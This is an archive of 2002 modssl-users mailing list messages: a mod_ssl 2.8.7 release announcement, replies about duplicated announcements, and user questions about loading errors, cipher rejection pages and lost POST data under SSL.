http://www.modssl.org/source/ o ftp://ftp.modssl.org/source/ Yours, Ralf S. Engelschall rse@engelschall.com www.engelschall.com Changes with mod_ssl 2.8.7 (01-Feb-2002 to 23-Feb-2002) *) Support for the latest OpenSSL 0.9.7 snapshots. *) Fixed potential buffer overflow in DBM and SHMHT session cache if very very large certificate chains are used. *) Compliance with POSIX 1003.1-2001 (SUSv3) by replacing obsolete "head -1" and "tail -1" constructs with sed variants in scripts. *) Fixed file descriptor leakage under Win32. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org Official Announcement Mailing List modssl-announce@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org Official Announcement Mailing List modssl-announce@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 24 11:47:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA15679; Sun, 24 Feb 2002 11:46:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta02.mail.mel.aone.net.au id LAA15619; Sun, 24 Feb 2002 11:45:25 +0100 (MET) Received: from postgresql.org ([63.34.219.34]) by mta02.mail.mel.aone.net.au with ESMTP id <20020224103210.DZJX19770.mta02.mail.mel.aone.net.au@postgresql.org>; Sun, 24 Feb 2002 21:32:10 +1100 Message-ID: <3C78C0AB.8BB64EB2@postgresql.org> Date: Sun, 24 Feb 2002 21:30:03 +1100 From: Justin Clift X-Mailer: Mozilla 4.78 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: =?iso-8859-1?Q?S=F8ren?= Neigaard CC: modssl-users@modssl.org Subject: Re: CBT Series on mod_ssl needed? References: <3C77CF4B.DD876481@postgresql.org> <169936015.20020224103042@e-box.dk> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Justin Clift X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Søren, Thanks for your feedback, it's really appreciated! New users are the ones whom I create these CBT's for. A lot of the time with things, it's learning the concepts enough to get it up-and-running quickly and well that's needed. Once someone knows the general concepts and have it running, they can get the rest of the knowledge they need through reading the documentation and other materials. That's what I've found so far anyway. :) You're the only person who's answered my question though, so I'm guessing this isn't really a popular viewpoint with the majority of the mod_ssl people. :( Hope I'm wrong and after the weekend is over I get a few more email. :-) Regards and best wishes, Justin Clift So, that's one person saying yes Søren Neigaard wrote: > > Saturday, February 23, 2002, 6:20:11 PM, Justin wrote: > > JC> Hi everyone, > > JC> Just wondering if there would be a use if I started creating a free > JC> series of Computer Based Training tutorials for mod_ssl, similar to the > JC> series I've started for PostgreSQL : > > JC> http://techdocs.postgresql.org/college/ > > JC> These are Flash based animations (about 200k) which explain some of the > JC> basic concepts of PostgreSQL. So far, the feedback about them is really > JC> positive and I'm looking at other Open Source projects which would > JC> benefit (as well as continuing the PostgreSQL series). > > I'm new to mod_ssl and SSL in general, and I would say YES please, > that would be really nice :) > > What do you think those tutorials would cover? I have been reading the > documentation, but for me it isn't easy at all. The documentation > covers all the configuration of mod_ssl, but I really don't know what > happens when I start my mod_ssl-Apache server, or even if there is > more than one way to start it. Also I don't know how I add > users/passwords to a server or VirtualHost, so that only those users > has access. > > I don't know if this is too basic, or what you had in mind, but the > idea sounds GREATH to a newbie like me :) And I also know that if I > ask these really basic questions here, I upset a lot of people, so I > have my fingers crossed for a nice tutorial :) > > -- > Med venlig hilsen/Best regards, > Søren Neigaard mailto:neigaard@e-box.dk > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- "My grandfather once told me that there are two kinds of people: those who work and those who take the credit. He told me to try to be in the first group; there was less competition there." - Indira Gandhi ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 24 19:16:59 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA18431; Sun, 24 Feb 2002 19:15:43 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from c1593933-a.boulder1.co.home.com id TAA18228; Sun, 24 Feb 2002 19:14:09 +0100 (MET) Received: (from bryan@localhost) by c1593933-a.boulder1.co.home.com (8.11.6/8.11.6) id g1OIGuO28918; Sun, 24 Feb 2002 11:16:56 -0700 X-Authentication-Warning: c1593933-a.boulder1.co.home.com: bryan set sender to bryan_lists@netmeme.org using -f Subject: Re: [ANNOUNCE] mod_ssl 2.8.7-1.3.23 From: Bryan Field-Elliot To: modssl-users@modssl.org In-Reply-To: <20020223192215.GA88696@engelschall.com> References: <20020223192215.GA88696@engelschall.com> Content-Type: multipart/alternative; boundary="=-27fJxeiT/fLsMcyMIjZA" X-Mailer: Evolution/1.0.1.99+cvs.2002.01.14.17.03 (Preview Release) Date: 24 Feb 2002 11:16:56 -0700 Message-Id: <1014574616.17220.28.camel@c1593933-a.boulder1.co.home.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bryan Field-Elliot X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-27fJxeiT/fLsMcyMIjZA Content-Type: text/plain Content-Transfer-Encoding: 7bit Has anybody else received a copy of this announcement around 30 times over the last couple of days? On Sat, 2002-02-23 at 12:22, Ralf S. Engelschall wrote: Another little round in maintaining mod_ssl 2.x for Apache 1.3.x brings to you today mod_ssl 2.8.7 for Apache 1.3.23. The corresponding CHANGES entries follow for your convinience. Fetch it from: o http://www.modssl.org/source/ o ftp://ftp.modssl.org/source/ Yours, Ralf S. Engelschall rse@engelschall.com www.engelschall.com Changes with mod_ssl 2.8.7 (01-Feb-2002 to 23-Feb-2002) *) Support for the latest OpenSSL 0.9.7 snapshots. *) Fixed potential buffer overflow in DBM and SHMHT session cache if very very large certificate chains are used. *) Compliance with POSIX 1003.1-2001 (SUSv3) by replacing obsolete "head -1" and "tail -1" constructs with sed variants in scripts. *) Fixed file descriptor leakage under Win32. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org Official Announcement Mailing List modssl-announce@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org Official Announcement Mailing List modssl-announce@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org --=-27fJxeiT/fLsMcyMIjZA Content-Type: text/html; charset=utf-8 Has anybody else received a copy of this announcement around 30 times over the last couple of days?



On Sat, 2002-02-23 at 12:22, Ralf S. Engelschall wrote: 
Another little round in maintaining mod_ssl 2.x for Apache 1.3.x brings
to you today mod_ssl 2.8.7 for Apache 1.3.23. The corresponding CHANGES
entries follow for your convinience.

Fetch it from:

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.7 (01-Feb-2002 to 23-Feb-2002)

   *) Support for the latest OpenSSL 0.9.7 snapshots.

   *) Fixed potential buffer overflow in DBM and SHMHT session
      cache if very very large certificate chains are used.

   *) Compliance with POSIX 1003.1-2001 (SUSv3) by replacing obsolete
      "head -1" and "tail -1" constructs with sed variants in scripts.

   *) Fixed file descriptor leakage under Win32.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
Official Announcement Mailing List          modssl-announce@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
Official Announcement Mailing List          modssl-announce@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
--=-27fJxeiT/fLsMcyMIjZA-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 24 19:35:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA21517; Sun, 24 Feb 2002 19:34:38 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from smtp.digikom.net id TAA21384; Sun, 24 Feb 2002 19:33:42 +0100 (MET) Received: from s20.dknet.se ([10.0.0.55]) by smtp.digikom.net with Microsoft SMTPSVC(5.0.2195.3779); Sun, 24 Feb 2002 19:30:32 +0100 Received: from [192.168.0.104] [213.66.238.106] by s20.dknet.se with ESMTP (SMTPD32-6.06) id A1F33E8B0058; Sun, 24 Feb 2002 19:33:23 +0100 User-Agent: Microsoft-Entourage/10.0.0.1428 Date: Sun, 24 Feb 2002 19:33:34 +0100 Subject: Re: [ANNOUNCE] mod_ssl 2.8.7-1.3.23 From: G=?ISO-8859-1?B?9nJhbiBGcvY=?=jdh To: Message-ID: In-Reply-To: <1014574616.17220.28.camel@c1593933-a.boulder1.co.home.com> Mime-version: 1.0 Content-type: multipart/alternative; boundary="B_3097424016_12994040" X-OriginalArrivalTime: 24 Feb 2002 18:30:32.0859 (UTC) FILETIME=[57FA66B0:01C1BD61] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: G=?ISO-8859-1?B?9nJhbiBGcvY=?=jdh X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Detta meddelande r i MIME-format. P grund av att din e-postl sare inte frst r detta format, kommer hela eller delar av detta meddelande inte att vara l sbart. --B_3097424016_12994040 Content-type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable Den 02-02-24 19.16 skrev "Bryan Field-Elliot" f=F6ljande: > Has anybody else received a copy of this announcement around 30 times ove= r the > last couple of days? No, but at least 10... --B_3097424016_12994040 Content-type: text/html; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable Re: [ANNOUNCE] mod_ssl 2.8.7-1.3.23 Den 02-02-24 19.16 skrev "Bryan Field-Elliot"= ; <bryan_lists@netmeme.org> följande:

Has anybody else received a copy of= this announcement around 30 times over the last couple of days?

No, but at least 10...
 --B_3097424016_12994040-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 24 19:44:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA22844; Sun, 24 Feb 2002 19:43:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from wlv.to.gd-es.com id TAA22791; Sun, 24 Feb 2002 19:43:02 +0100 (MET) Received: from HDIS-C3620-A41.TO.GD-ES.COM (mcc@HDIS-C3620-A41.TO.GD-ES.COM [199.107.247.41]) by wlv.to.gd-es.com (8.11.6/8.10.1) with ESMTP id g1OIdpQ02531 for ; Sun, 24 Feb 2002 10:39:51 -0800 (PST) Date: Sun, 24 Feb 2002 10:39:49 -0800 (PST) From: Merton Campbell Crockett X-Sender: mcc@SPIELZEUG.HASENTALER.THOUSAND-OAKS.CA.US To: modssl-users@modssl.org Subject: Re: [ANNOUNCE] mod_ssl 2.8.7-1.3.23 In-Reply-To: <1014574616.17220.28.camel@c1593933-a.boulder1.co.home.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Merton Campbell Crockett X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 24 Feb 2002, Bryan Field-Elliot wrote: > Has anybody else received a copy of this announcement around 30 times > over the last couple of days? Yes. It would be nice if people with local lists would not "blindly" re-insert messages from the list back into the list. -- BEGIN: vcard VERSION: 3.0 FN: Merton Campbell Crockett ORG: General Dynamics Advanced Information Systems; Intelligence Solutions N: Crockett;Merton;Campbell EMAIL;TYPE=internet: mcc@CATO.GD-AIS.COM TEL;TYPE=work,voice,msg,pref: +1(805)497-5045 TEL;TYPE=pager,msg: +1(877)528-0049 TEL;TYPE=fax,work: +1(805)497-5050 TEL;TYPE=cell,voice,msg: +1(805)377-6762 END: vcard ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 25 09:26:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA11345; Mon, 25 Feb 2002 09:25:00 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from nixpbe.pdb.sbs.de id JAA11264; Mon, 25 Feb 2002 09:24:09 +0100 (MET) Received: from trulli.pdb.fsc.net (ThisAddressDoesNotExist [172.25.96.20] (may be forged)) by nixpbe.pdb.sbs.de (8.11.2/8.11.2) with ESMTP id g1P8O2521193; Mon, 25 Feb 2002 09:24:02 +0100 Received: from deejai2.mch.fsc.net (deejai2.mch.fsc.net [172.25.124.236]) by trulli.pdb.fsc.net (8.9.3/8.9.3) with ESMTP id JAA13751; Mon, 25 Feb 2002 09:24:01 +0100 Received: (from martin@localhost) by deejai2.mch.fsc.net (8.11.6/8.11.6) id g1P8O1F45299; Mon, 25 Feb 2002 09:24:01 +0100 (CET) (envelope-from martin) Date: Mon, 25 Feb 2002 09:24:01 +0100 From: Martin Kraemer To: modssl-users@modssl.org Cc: rse@engelschall.com Subject: Re: [ANNOUNCE] mod_ssl 2.8.7-1.3.23 Message-ID: <20020225092401.A43800@deejai2.mch.fsc.net> References: <20020223192215.GA88696@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020223192215.GA88696@engelschall.com>; from rse@engelschall.com on Sat, Feb 23, 2002 at 08:22:15PM +0100 X-Operating-System: FreeBSD 4.5-STABLE FreeBSD 4.5-STABLE X-Organization: Fujitsu Siemens Computers (Muenchen, Germany) X-Disclaimer: THE COMMENTS CONTAINED IN THIS MESSAGE REFLECT THE VIEWS OF THE WRITER AND ARE NOT NECESSARILY THE VIEWS OF FUJITSU-SIEMENS COMPUTERS X-No-Junk-Mail: I do not want to get *any* junk mail. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Martin Kraemer X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sat, Feb 23, 2002 at 08:22:15PM +0100, Ralf S. Engelschall wrote: > > Another little round in maintaining mod_ssl 2.x for Apache 1.3.x brings > to you today mod_ssl 2.8.7 for Apache 1.3.23. The corresponding CHANGES > entries follow for your convinience. Kannst Du bitte, wie sonst ueblich, die PGP-Signaturdatei dazu anlegen? http://www.modssl.org:80/source/mod_ssl-2.8.7-1.3.23.tar.gz.asc: 09:14:40 FEHLER 404: Not Found. Danke, Martin -- | Fujitsu Siemens Fon: +49-89-636-46021, FAX: +49-89-636-47655 | 81730 Munich, Germany ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 25 12:16:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA26634; Mon, 25 Feb 2002 12:15:43 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA26498; Mon, 25 Feb 2002 12:14:25 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 5144C4CE638; Mon, 25 Feb 2002 10:09:09 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1P8sWf24871; Mon, 25 Feb 2002 09:54:32 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mel-rto7.wanadoo.fr id VAA06516; Sun, 24 Feb 2002 21:59:30 +0100 (MET) Received: from mel-rta9.wanadoo.fr (193.252.19.69) by mel-rto7.wanadoo.fr; 24 Feb 2002 21:59:24 +0100 Received: from lv4-26.com (193.253.232.232) by mel-rta9.wanadoo.fr; 24 Feb 2002 21:58:52 +0100 Received: from progstation01 [192.168.0.103] by lv4-26.com (FTGate 2, 2, 4, 1); Sun, 24 Feb 2002 21:58:44 +0100 Message-ID: <000801c1bd76$0d953f40$6700a8c0@progstation01> From: "MARTIN Pierre" To: Subject: mod_ssl + apache 1.3.22 / 1.3.23 Problem, Help please. Date: Sun, 24 Feb 2002 21:58:46 +0100 Organization: HicksCorp MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0005_01C1BD7E.6F00FFF0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "MARTIN Pierre" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users C'est un message de format MIME en plusieurs parties. ------=_NextPart_000_0005_01C1BD7E.6F00FFF0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, Im writing you this mail beacause of a problem i have with mod_ssl. I tryed a lot of different settings, and i do not find any issue to it. I have an apache webserver (i tryed both 1.3.22 and 1.3.23) with the = mod_ssl. I cant load it, because of this error: Cannot load mod_ssl into server: (127) The specified routine is = unfindable.? (From french translation sorry...) So i cant load it. I have some few stuff to say: I tryed with some of the contribution distributions, and it seems to = work. But when i am trying to use it with these distributions, all the = others modules do not load (A lot of warning like the one described = before) I NEED to make it work with the official apache distribution, because i = have to upgrade the apache software when new versions exists and i HAVE = to use the ones from the official website apache.org Does anyone know what to do in this case? Thank you a lot. Regards, Pierre http://hickscorp.dyndns.org http://3dMeeting.dyndns.org http://Iloa.dyndns.org http://StatsAGogo.dyndns.org http://www.Lv4-26.com MSN: HicksCorp@Hotmail.com ICQ: 73133239 ------=_NextPart_000_0005_01C1BD7E.6F00FFF0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi,
 
Im writing you this mail beacause of a = problem i=20 have with mod_ssl.
I tryed a lot of different settings, = and i do not=20 find any issue to it.
 
I have an apache webserver (i tryed = both 1.3.22 and=20 1.3.23) with the mod_ssl. I cant load it, because of this = error:
Cannot load mod_ssl into server: (127) = The=20 specified routine is unfindable.? (From french translation=20 sorry...)
So i cant load it.
 
I have some few stuff to = say:
I tryed with some of the contribution=20 distributions, and it seems to work. But when i am trying to use it with = these=20 distributions, all the others modules do not load (A lot of warning like = the one=20 described before)
 
I NEED to make it work with the = official apache=20 distribution, because i have to upgrade the apache software when new = versions=20 exists and i HAVE to use the ones from the official website=20 apache.org
Does anyone know what to do in this=20 case?
 
Thank you a lot.
 
Regards, Pierre
 
http://hickscorp.dyndns.org
<= A=20 href=3D"http://3dMeeting.dyndns.org">http://3dMeeting.dyndns.org
<= A=20 href=3D"http://Iloa.dyndns.org">http://Iloa.dyndns.org
http://StatsAGogo.dyndns.orghttp://www.Lv4-26.com
 
MSN: HicksCorp@Hotmail.com
ICQ:=20 73133239
------=_NextPart_000_0005_01C1BD7E.6F00FFF0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 25 12:40:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA00164; Mon, 25 Feb 2002 12:39:45 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id MAA00138; Mon, 25 Feb 2002 12:39:19 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id MAA26906 for ; Mon, 25 Feb 2002 12:39:13 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma026867; Mon, 25 Feb 02 12:39:07 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id MAA14350 for ; Mon, 25 Feb 2002 12:39:06 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id MAA06019 for ; Mon, 25 Feb 2002 12:39:04 +0100 (MET) Message-ID: <3C7A2258.213198B5@bourse.ch> Date: Mon, 25 Feb 2002 12:39:04 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: mod_ssl + apache 1.3.22 / 1.3.23 Problem, Help please. References: <000801c1bd76$0d953f40$6700a8c0@progstation01> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > MARTIN Pierre wrote: > > Hi, > > Im writing you this mail beacause of a problem i have with mod_ssl. > I tryed a lot of different settings, and i do not find any issue to > it. > > I have an apache webserver (i tryed both 1.3.22 and 1.3.23) with the > mod_ssl. I cant load it, because of this error: > Cannot load mod_ssl into server: (127) The specified routine is > unfindable.? (From french translation sorry...) > So i cant load it. - How did you compile mod_ssl? - Where is the mod_ssl.so? - What is your AddModule line like? Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 25 22:26:38 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA25586; Mon, 25 Feb 2002 22:00:59 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA25240; Mon, 25 Feb 2002 21:57:47 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 162BC4CE746; Mon, 25 Feb 2002 21:00:12 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1PJw6j37563; Mon, 25 Feb 2002 20:58:06 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from bnls901a id RAA27841; Mon, 25 Feb 2002 17:36:23 +0100 (MET) Received: by bnls205a.sni.co.uk with Internet Mail Service (5.5.2653.19) id ; Mon, 25 Feb 2002 16:36:18 -0000 Message-ID: <077AD8BDA52CD41197E900104B42A584EF8FB6@bnls230a.sni.co.uk> From: "Bray, Mike" To: "'modssl-users@modssl.org'" Subject: Strong encryption Date: Mon, 25 Feb 2002 16:36:24 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bray, Mike" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi We are using strong encryption with Apache (1.3.19) mod_ssl (2.8.5), openssl (0.9.5). We have the SSLCipher set to HIGH:+MEDIUM This rejects weak browsers, i.e. less than 128 bit encryption but it does it with a 'PAGE CAN NOT BE DISPLAYED'. I have looked at the logs and have found the error in client hello (no ciphers to share) but nothing goes into the Apache access logs. What we want to do is display a more friendly page helping the user upgrade their browser. Can you recommend any way to catch this error and output an error page. Regards Mike Bray -------------------------------------------------- E-Mail: mike.bray@sbs.siemens.co.uk Mobile: +44 (0)7808 822 833 Tel.: +44 (0)1344 784371 Fax: +44 (0)1344 765442 If you have received this email in error please notify the SBS Helpdesk by telephone on ++44 (0) 2380 76 5080 / 5000 or e-mail at sbshelp@sbs.siemens.co.uk. This e-mail contains confidential information and is for the exclusive use of the addressee/s. If you are not the addressee, then any distribution, copying or use of this e-mail is prohibited. If received in error, please advise the sender and delete it immediately. We accept no liability for any loss or damage suffered by any person arising from use of this e-mail. Siemens Business Services Limited Registered No: 1203466 England Registered Office: Siemens House, Oldbury, Bracknell, Berkshire, RG12 8FZ ----------------------------------------------------------- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 25 22:35:31 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA25624; Mon, 25 Feb 2002 22:01:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA25243; Mon, 25 Feb 2002 21:57:49 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 00C804CE73A; Mon, 25 Feb 2002 21:00:11 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1PJvvC37557; Mon, 25 Feb 2002 20:57:57 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from communicate.01com.com id QAA22539; Mon, 25 Feb 2002 16:35:26 +0100 (MET) Received: from 01com.com (DEV_MARIAN_P298 [10.0.0.32]) by communicate.01com.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id F25WT1V8; Mon, 25 Feb 2002 10:32:24 -0500 Message-ID: <3C7A59BE.2090804@01com.com> Date: Mon, 25 Feb 2002 10:35:26 -0500 From: Marian User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: POST request data does not get through with Netscape Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Marian X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! I found out that this problem was caused by an incompatibility between mod_gzip and mod_ssl. I do not know the solution yet, but I am still searching. Thank you, Marian Hi! I have the following problem: I am running Apache 1.3.22 with mod_ssl 2.8.5 and openssl 0.9.6b on a Windows 98 platform. I have a simple page on the server wich looks as follows: file : test.php ================================================= Sample of HTML Form Submission Hi .

Your name:

================================================= When I am trying to submit this page using Netscape 4.61 the POST data seems to get lost. I tried to create a log with the data that is passed through mod_ssl, but unfortunately the data is encripted and I do not know if the POST data is acctually received. The SSL log looks as follows: [20/Feb/2002 12:12:42 -267647] [info] Init: Loading certificate & private key of SSL-aware server localhost:443 [20/Feb/2002 12:12:42 -267647] [trace] Init: (localhost:443) unencrypted RSA private key - pass phrase not required [20/Feb/2002 12:12:43 -267647] [info] Init: Configuring server localhost:443 for SSL protocol [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring RSA server certificate [20/Feb/2002 12:12:43 -267647] [warn] Init: (localhost:443) RSA server certificate CommonName (CN) `01com' does NOT match server name!? [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring RSA server private key [20/Feb/2002 12:12:43 -267647] [info] Init: Configuring server localhost:443 for SSL protocol [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring RSA server certificate [20/Feb/2002 12:12:43 -267647] [warn] Init: (localhost:443) RSA server certificate CommonName (CN) `01com' does NOT match server name!? [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring RSA server private key [20/Feb/2002 12:12:43 -423811] [info] Init: Loading certificate & private key of SSL-aware server localhost:443 [20/Feb/2002 12:12:43 -423811] [trace] Init: (localhost:443) unencrypted RSA private key - pass phrase not required [20/Feb/2002 12:12:44 -423811] [info] Init: Configuring server localhost:443 for SSL protocol [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) Configuring RSA server certificate [20/Feb/2002 12:12:44 -423811] [warn] Init: (localhost:443) RSA server certificate CommonName (CN) `01com' does NOT match server name!? [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) Configuring RSA server private key 